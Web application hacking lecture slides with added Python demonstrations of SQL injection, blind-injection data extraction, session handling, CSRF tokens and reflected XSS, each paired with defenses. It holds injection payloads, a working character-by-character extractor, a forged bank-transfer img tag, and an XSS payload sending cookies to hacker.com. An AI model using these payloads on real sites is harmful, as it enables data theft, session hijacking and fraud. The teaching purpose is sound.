HACKING SCHOOL
Hacking Web Applications (Hacking de aplicaciones Web)
Gabriel Maciá Fernández
Web fundamentals
[Diagram: client side (browser, private data) <-- HTTP --> server side (web server, database)]
13/03/2015
Interaction with web servers
URLs
http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba.txt
Scheme: http
Authority: user info, server and port, here gmacia:pass@www.ugr.es:80 (the server name is what the DNS query resolves)
Path: /descarga.php
Arguments: file=prueba.txt
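Added example, not from the slides: splitting the URL above into those components with Python's standard urllib.parse. The second URL is constructed here to show the security-relevant detail of the authority part: everything before the "@" is user information, and the host that the DNS query is made for is whatever follows it.

```python
# Added example (not from the slides): URL components with Python's standard library.
from urllib.parse import urlsplit, parse_qs

def url_components(url: str) -> dict:
    """Return the scheme / authority / path / arguments breakdown of a URL."""
    parts = urlsplit(url)
    return {
        "scheme": parts.scheme,
        "userinfo": (parts.username, parts.password),
        "host": parts.hostname,   # the name the DNS query is made for
        "port": parts.port,
        "path": parts.path,
        "args": parse_qs(parts.query),
    }

SLIDE_URL = "http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba.txt"

# Constructed phishing-style URL: "www.ugr.es" here is only user info; the host
# is attacker.example (a hypothetical name used for this example).
DECEPTIVE_URL = "http://www.ugr.es@attacker.example/login"

if __name__ == "__main__":
    for u in (SLIDE_URL, DECEPTIVE_URL):
        print(u, "->", url_components(u))
```

The same split is what a browser performs before it decides where to send the request, which is why a URL that "starts with" a trusted name can still point somewhere else.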
WEB APPLICATION ATTACKS
OWASP
Brief history
OWASP Top 10 2013
1. Injection
2. Broken Authentication and Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross-Site Request Forgery (CSRF)
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects and Forwards
INJECTION ATTACKS
Injection attacks
Basis: untrusted data is sent to an interpreter as part of a command or query.
Some types:
SQL injection
LDAP injection
Command injection
Hibernate (HQL) injection
XPath injection
Local File Inclusion (LFI)
Remote File Inclusion (RFI)
SQL (Structured Query Language)
Example users table:
Name     Email           Password
Gabriel  gmacia@ugr.es   J3oldgs23
Juan     juan@ugr.es     Sdwe3342&
Luis     luis@ugr.es     34s3gsd23
Code on the server
SQL injection
Gabriel' OR 1=1); --
Shall we try it?
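The slide's server code was not reproduced in the text, so the following is an added example (not the slide's own code): a lookup that concatenates the user-supplied name into the SQL, attacked with the payload above, next to the same lookup with a bound parameter. The query shape with the parenthesis is an assumption chosen so that the payload's `); --` closes it and comments out the rest; the table is the one from the slide, loaded into an in-memory SQLite database.

```python
# Added example (not the slide's server code): SQL injection against a
# string-built query versus a parameterized query, on the slide's users table.
import sqlite3

USERS = [  # the slide's table (passwords stored in clear, as on the slide)
    ("Gabriel", "gmacia@ugr.es", "J3oldgs23"),
    ("Juan", "juan@ugr.es", "Sdwe3342&"),
    ("Luis", "luis@ugr.es", "34s3gsd23"),
]

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return db

def lookup_vulnerable(db, name: str) -> list:
    # String formatting: the input becomes part of the SQL grammar.
    # Assumed query shape: the parenthesis is what the payload's ")" closes.
    sql = "SELECT name, email FROM users WHERE (name = '%s')" % name
    return db.execute(sql).fetchall()

def lookup_parameterized(db, name: str) -> list:
    # Bound parameter: the input is only ever a value, never SQL.
    sql = "SELECT name, email FROM users WHERE (name = ?)"
    return db.execute(sql, (name,)).fetchall()

PAYLOAD = "Gabriel' OR 1=1); --"
# Resulting SQL in the vulnerable version:
#   SELECT name, email FROM users WHERE (name = 'Gabriel' OR 1=1); --')

def demo() -> tuple:
    db = make_db()
    leaked = lookup_vulnerable(db, PAYLOAD)     # OR 1=1 matches every row
    safe = lookup_parameterized(db, PAYLOAD)    # nobody is literally named that
    return len(leaked), len(safe)

if __name__ == "__main__":
    print(demo())
```

The parameterized version does not need any escaping logic: the driver sends the value separately from the statement text, so there is no grammar for the input to alter.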
Boolean exploitation
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
Error-based exploitation
INPUT:
id=10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))
OUTPUT:
ORA-29257: host SCOTT unknown
Time-delay exploitation
id=10 AND IF(version() like '5%', sleep(10), false)
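The boolean-based technique above, as an added example that is not part of the slides: the attacker only sees whether the page shows a record, and uses that one bit per request to recover a column character by character. The endpoint, its query and the table are constructed here in SQLite, whose `unicode()` and `substr()` play the role of the `ASCII()` and `SUBSTRING()` in the slide's payload; a binary search on the code point keeps it to about seven requests per character. The time-delay variant is the same loop with a `sleep()` condition and the response time as the oracle.

```python
# Added example (not from the slides): boolean-based blind SQL injection.
import sqlite3

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "Gabriel", "gmacia@ugr.es"),
        (2, "Juan", "juan@ugr.es"),
        (3, "Luis", "luis@ugr.es"),
    ])
    return db

def page_shows_record(db, id_param: str) -> bool:
    """Constructed vulnerable endpoint: 'id' is concatenated into the query and
    the only thing an attacker observes is whether a row came back."""
    sql = "SELECT email FROM users WHERE id = '%s'" % id_param
    return db.execute(sql).fetchone() is not None

def oracle(db, condition: str) -> bool:
    # Same shape as the slide's payload:  1' AND <condition> AND '1'='1
    return page_shows_record(db, "1' AND %s AND '1'='1" % condition)

def extract_username(db, max_len: int = 32) -> str:
    """Recover users.username for id=1 one character at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the position is past the end of the string.
        if not oracle(db, "length(username) >= %d" % pos):
            break
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:    # binary search on the code point of character 'pos'
            mid = (lo + hi) // 2
            if oracle(db, "unicode(substr(username,%d,1)) > %d" % (pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered

if __name__ == "__main__":
    print(extract_username(make_db()))
```

Nothing in the responses ever contains the username; it is reconstructed entirely from the true/false pattern, which is why blind injection is still fully exploitable when the application swallows query results and errors.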
Escaping
Replace problematic characters with safe ones
Change ' to \'
There are libraries to do this
Whitelisting
E.g. an integer within the right range
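Added example (not from the slides) contrasting the two defenses above: escaping the quote keeps an input inside a quoted literal, but the slide's time-delay payload goes into a numeric `id=10 ...` position where there is no quote at all, so escaping changes nothing and an integer whitelist is what stops it. The table and endpoints are constructed here; SQLite's dialect doubles the quote where MySQL would use the `\'` from the slide.

```python
# Added example (not from the slides): escaping versus whitelisting, showing
# where escaping alone fails (a numeric context) and the whitelist holds.
import sqlite3

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)", [(10, "guitar"), (11, "amp")])
    return db

def escape_quotes(value: str) -> str:
    """Escaping: neutralise the quote. SQLite doubles it; the slide's \\' is
    the MySQL form of the same idea."""
    return value.replace("'", "''")

def lookup_name_escaped(db, name: str) -> list:
    # String context: with the quote escaped the input cannot leave the literal.
    sql = "SELECT name FROM items WHERE name = '%s'" % escape_quotes(name)
    return db.execute(sql).fetchall()

def lookup_id_escaped(db, id_param: str) -> list:
    # Numeric context: no quote to escape, so escaping does nothing here.
    sql = "SELECT name FROM items WHERE id = %s" % escape_quotes(id_param)
    return db.execute(sql).fetchall()

def whitelist_id(value: str, lo: int = 1, hi: int = 100000) -> int:
    """Whitelist: accept only a decimal integer within the expected range."""
    if not value.isdigit():
        raise ValueError("id must be a decimal integer")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError("id out of range")
    return n

def lookup_id_whitelisted(db, id_param: str) -> list:
    sql = "SELECT name FROM items WHERE id = ?"
    return db.execute(sql, (whitelist_id(id_param),)).fetchall()

STRING_PAYLOAD = "' OR 1=1 --"   # has to break out of a quoted literal
NUMERIC_PAYLOAD = "10 OR 1=1"    # no quote involved anywhere

def demo() -> tuple:
    db = make_db()
    string_rows = len(lookup_name_escaped(db, STRING_PAYLOAD))   # escaping works
    numeric_rows = len(lookup_id_escaped(db, NUMERIC_PAYLOAD))   # escaping is useless
    try:
        lookup_id_whitelisted(db, NUMERIC_PAYLOAD)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return string_rows, numeric_rows, verdict

if __name__ == "__main__":
    print(demo())
```

Escaping has to be done per context (string literal, number, identifier, LIKE pattern) and per SQL dialect, which is the practical reason the whitelist plus bound parameters is the combination to reach for.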
SESSION HIJACKING ATTACKS
Stateful HTTP
HTTP is stateless
Cookies are used to implement statefulness
Session Hijacking
Knowing a cookie gives you access with the privileges of the user that established that session
How to steal session cookies
Shall we try it?
Defenses
Unpredictability
Random and long cookies
Timeout sessions and delete tokens
IP address check (a doubtful defense)
May be problematic:
Change of IP due to DHCP, or WiFi to 3G
Same IP for everyone behind a NAT box
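Added example, not from the slides: a minimal server-side session store that applies the defenses listed above (long random identifiers from the OS CSPRNG, an idle timeout after which the token is deleted, explicit logout) beside the sequential-identifier anti-pattern that makes hijacking a matter of counting. The class, its injectable clock and the 15-minute timeout are this example's own choices.

```python
# Added example (not from the slides): session tokens done right and wrong.
import hashlib, secrets, time

SESSION_TIMEOUT = 15 * 60   # seconds of inactivity after which the token is deleted

def _key(token: str) -> str:
    # Only a hash of the cookie is kept server-side, so a dump of the store
    # yields no usable cookies.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()

class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so the timeout can be exercised
        self._sessions = {}      # sha256(token) -> {"user": ..., "last_seen": ...}

    def create(self, user: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 random bits: unpredictable and long
        self._sessions[_key(token)] = {"user": user, "last_seen": self._clock()}
        return token                        # what goes into the Set-Cookie header

    def user_for(self, token: str):
        """Return the user bound to a cookie, or None if unknown or expired."""
        sess = self._sessions.get(_key(token))
        if sess is None:
            return None
        if self._clock() - sess["last_seen"] > SESSION_TIMEOUT:
            self.logout(token)              # expired: delete it, do not just ignore it
            return None
        sess["last_seen"] = self._clock()
        return sess["user"]

    def logout(self, token: str) -> None:
        self._sessions.pop(_key(token), None)

def sequential_token(counter: int) -> str:
    """The anti-pattern: one observed cookie lets a hijacker enumerate the rest."""
    return "sess-%06d" % counter

def demo() -> tuple:
    now = [1_000_000.0]                      # fake clock for the example
    store = SessionStore(clock=lambda: now[0])
    cookie = store.create("gabriel")
    before = store.user_for(cookie)          # valid session
    now[0] += SESSION_TIMEOUT + 1            # user idle past the timeout
    after = store.user_for(cookie)           # None, and the token is gone
    return before, after, len(cookie)

if __name__ == "__main__":
    print(demo())
```

The timeout limits how long a stolen cookie stays useful; the entropy of the token is what makes guessing one infeasible in the first place. An IP check could be layered on top, with the caveats the slide lists.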
CROSS-SITE REQUEST FORGERY (CSRF) ATTACKS
Fundamentals
Imagine that:
A user is logged in with an active session cookie
This request is issued:
http://banco.com/transfer?cant=6000&a=hacker
CSRF attack
<img src=http://banco.com/transfer?cant=6000&a=hacker>
[Diagram: hacker.com serves a page containing that img tag; the browser requests the URL from banco.com with the user's cookie attached; $$$ are transferred]
Defenses
Using the REFERER field
Problems:
Referer is optional
The attacker can force the referer not to be sent:
Man in the middle
Browser vulnerability
Bounce the user off a page such as ftp://page
Using secretized links (a per-session secret token in the link)
http://website.com/algo.html?sid=81sdgs234e
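The secretized-link defense above, as an added example that is not part of the slides: the token is an HMAC of the session identifier under a server-side key, so it is bound to the session and cannot be reused from another account. The forged request from hacker.com carries the victim's cookie but not the token, so the server rejects it. The key, the request handling and the session identifiers are constructed for this example; the transfer URL is the slide's.

```python
# Added example (not from the slides): per-session CSRF tokens in the link.
import hashlib, hmac, secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)   # kept server-side only

def csrf_token(session_id: str) -> str:
    """Token bound to the session: stolen from one user, useless for another."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()

def transfer_link(session_id: str) -> str:
    """The secretized link banco.com embeds in its own pages (slide URL plus sid)."""
    return "http://banco.com/transfer?cant=6000&a=hacker&sid=" + csrf_token(session_id)

def handle_transfer(session_id: str, url: str) -> str:
    """Server side: the cookie identifies the session, but the transfer only goes
    through if the request also carries the token tied to that session."""
    args = parse_qs(urlsplit(url).query)
    sent = args.get("sid", [""])[0]
    if not sent.isascii() or not hmac.compare_digest(sent, csrf_token(session_id)):
        return "rejected: missing or wrong CSRF token"
    return "transferred %s to %s" % (args["cant"][0], args["a"][0])

def demo() -> tuple:
    victim = "victim-session-cookie"          # constructed session id
    # Request as issued by <img src=...> on hacker.com: cookie sent, no token.
    forged = handle_transfer(victim, "http://banco.com/transfer?cant=6000&a=hacker")
    # Request issued from the bank's own page, which carries the token.
    legit = handle_transfer(victim, transfer_link(victim))
    # Token the attacker obtained for their own session does not transfer.
    other = handle_transfer(victim, transfer_link("attacker-session-cookie"))
    return forged.startswith("rejected"), legit, other.startswith("rejected")

if __name__ == "__main__":
    print(demo())
```

Unlike the Referer check, this does not depend on what the browser chooses to send: the attacker's page cannot read the bank's pages (same origin policy), so it cannot learn the token to put in its forged URL.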
CROSS-SITE SCRIPTING (XSS) ATTACKS
Same origin policy
JavaScript enables Web 2.0:
Modify web pages (DOM)
Track events
Issue web requests and maintain connections (AJAX)
Read and set cookies
Browsers provide isolation for JavaScript scripts via the Same Origin Policy
Only scripts received from a web page's origin have access to the page's elements
Stored XSS attack
[Diagram: (1) the attacker injects a malicious script into banco.com; (4) the victim's browser executes the script as if the server had requested it, issuing e.g. GET http://banco.com/roba?c=document.cookie or GET http://banco.com/transfer?cant=6000&a=hacker]
Reflected XSS attack
[Diagram: hacker.com hands the victim a URL specially crafted for the attack; (5) the browser executes the script as if banco.com's server had requested it]
Echo of user input
The key: finding situations where a server echoes the user input back in the HTML response
Example:
GET http://victim.com/search.php?term=guitars
The HTML response echoes the search term back:
</body></html>
Shall we try it?
Defenses
Sanitizing: remove executable portions of user-provided input
Done on many blogs, e.g. WordPress:
https://wordpress.org/plugins/htmlpurified/
Blacklist vs Whitelist
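Added example, not from the slides, covering the echo of user input above and the defenses just listed: a search page that reflects the `term` argument into its HTML, rendered four ways: raw (the reflected XSS), with a blacklist that strips `<script>`, with output encoding, and with a whitelist of allowed characters. The page template, the cookie-stealing payload (exfiltrating to a hypothetical hacker.com, following the slide's `roba?c=document.cookie` pattern) and the blacklist-bypass payload are constructed here.

```python
# Added example (not from the slides): reflected XSS via echoed input, and
# blacklist versus encoding versus whitelist as defenses.
import html, re
from urllib.parse import parse_qs, urlencode, urlsplit

TEMPLATE = "<html><body><h1>Results for: %s</h1></body></html>"   # constructed page

def url_for(term: str) -> str:
    """Build the search URL with 'term' encoded the way a browser would send it."""
    return "http://victim.com/search.php?" + urlencode({"term": term})

def term_from(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("term", [""])[0]

def render_vulnerable(url: str) -> str:
    # Raw echo: markup in 'term' becomes markup in the page.
    return TEMPLATE % term_from(url)

def render_blacklisted(url: str) -> str:
    # Blacklist: remove the literal "<script>" tag. Bypassable, see BYPASS below.
    return TEMPLATE % term_from(url).replace("<script>", "")

def render_escaped(url: str) -> str:
    # Output encoding: <, >, &, quotes become entities, so the browser shows text.
    return TEMPLATE % html.escape(term_from(url), quote=True)

ALLOWED = re.compile(r"^[A-Za-z0-9 ]{0,64}$")

def render_whitelisted(url: str) -> str:
    # Whitelist: accept only letters, digits and spaces; drop anything else.
    term = term_from(url)
    if not ALLOWED.match(term):
        term = ""
    return TEMPLATE % html.escape(term, quote=True)

def contains_script(page: str) -> bool:
    """Crude check for this demo: does the response contain an executable tag?"""
    return "<script" in page.lower()

# Constructed payloads.
PAYLOAD = "<script>new Image().src='http://hacker.com/roba?c='+document.cookie</script>"
BYPASS = "<scr<script>ipt>alert(1)</script>"   # stripping "<script>" once reassembles it

def demo() -> dict:
    return {
        "vulnerable": contains_script(render_vulnerable(url_for(PAYLOAD))),
        "blacklist_plain": contains_script(render_blacklisted(url_for(PAYLOAD))),
        "blacklist_bypass": contains_script(render_blacklisted(url_for(BYPASS))),
        "escaped": contains_script(render_escaped(url_for(PAYLOAD))),
        "whitelist": contains_script(render_whitelisted(url_for(PAYLOAD))),
    }

if __name__ == "__main__":
    for name, executable in demo().items():
        print("%-17s script reaches browser: %s" % (name, executable))
```

The blacklist stops the obvious payload and nothing else; encoding on output is what makes echoed data inert regardless of what it contains, and a whitelist on input additionally rejects anything the field has no business carrying.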
The challenge
Thanks to:
Michael Hicks for his nice examples about web attacks